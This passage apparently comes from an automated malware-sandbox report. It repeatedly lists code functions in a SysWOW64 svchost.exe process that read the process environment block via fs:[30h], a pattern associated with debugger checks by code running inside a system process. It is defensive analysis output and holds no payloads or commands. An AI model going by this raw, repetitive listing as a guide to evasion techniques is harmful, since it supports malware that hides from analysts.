Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h] 2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h] 2_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h] 2_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h] 2_2_039EC3CD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] 2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] 2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] 2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] 2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h] 2_2_039B63C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039663FF mov eax, dword ptr fs:[00000030h] 2_2_039663FF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h] 2_2_0392C310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h] 2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h] 2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h] 2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h] 2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h] 2_2_03950310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h] 2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h] 2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h] 2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h] 2_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h] 2_2_039D8350
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D437C mov eax, dword ptr fs:[00000030h] 2_2_039D437C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h] 2_2_03A0634F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h] 2_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h] 2_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h] 2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h] 2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h] 2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h] 2_2_039402A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h] 2_2_039402A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h] 2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h] 2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h] 2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h] 2_2_03A062D6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392823B mov eax, dword ptr fs:[00000030h] 2_2_0392823B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h] 2_2_0392A250
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936259 mov eax, dword ptr fs:[00000030h] 2_2_03936259
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h] 2_2_039EA250
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h] 2_2_039EA250
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h] 2_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h] 2_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h] 2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h] 2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h] 2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392826B mov eax, dword ptr fs:[00000030h] 2_2_0392826B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h] 2_2_03A0625D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] 2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] 2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] 2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] 2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h] 2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h] 2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h] 2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03970185 mov eax, dword ptr fs:[00000030h] 2_2_03970185
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h] 2_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h] 2_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h] 2_2_039D4180
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h] 2_2_039D4180
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h] 2_2_03A061E5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h] 2_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h] 2_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h] 2_2_039601F8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h] 2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h] 2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h] 2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h] 2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h] 2_2_039F0115
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03960124 mov eax, dword ptr fs:[00000030h] 2_2_03960124
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h] 2_2_0392C156
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h] 2_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h] 2_2_03A04164
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h] 2_2_03A04164
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936154 mov eax, dword ptr fs:[00000030h] 2_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936154 mov eax, dword ptr fs:[00000030h] 2_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h] 2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h] 2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h] 2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h] 2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h] 2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393208A mov eax, dword ptr fs:[00000030h] 2_2_0393208A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h] 2_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h] 2_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h] 2_2_039280A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h] 2_2_039C80A8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h] 2_2_039B20DE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0392C0F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h] 2_2_039720F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0392A0E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h] 2_2_039380E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h] 2_2_039B60E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h] 2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h] 2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h] 2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h] 2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h] 2_2_039B4000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h] 2_2_039C6030
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h] 2_2_0392A020
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h] 2_2_0392C020
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03932050 mov eax, dword ptr fs:[00000030h] 2_2_03932050
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h] 2_2_039B6050
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h] 2_2_0395C073
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D678E mov eax, dword ptr fs:[00000030h] 2_2_039D678E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039307AF mov eax, dword ptr fs:[00000030h] 2_2_039307AF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h] 2_2_039E47A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h] 2_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h] 2_2_039B07C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039347FB mov eax, dword ptr fs:[00000030h] 2_2_039347FB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039347FB mov eax, dword ptr fs:[00000030h] 2_2_039347FB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h] 2_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h] 2_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h] 2_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h] 2_2_039BE7E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930710 mov eax, dword ptr fs:[00000030h] 2_2_03930710
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03960710 mov eax, dword ptr fs:[00000030h] 2_2_03960710
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h] 2_2_0396C700
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396273C mov eax, dword ptr fs:[00000030h] 2_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h] 2_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396273C mov eax, dword ptr fs:[00000030h] 2_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h] 2_2_039AC730
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h] 2_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h] 2_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930750 mov eax, dword ptr fs:[00000030h] 2_2_03930750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h] 2_2_039BE75D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972750 mov eax, dword ptr fs:[00000030h] 2_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972750 mov eax, dword ptr fs:[00000030h] 2_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h] 2_2_039B4755
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396674D mov esi, dword ptr fs:[00000030h] 2_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396674D mov eax, dword ptr fs:[00000030h] 2_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396674D mov eax, dword ptr fs:[00000030h] 2_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03938770 mov eax, dword ptr fs:[00000030h] 2_2_03938770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
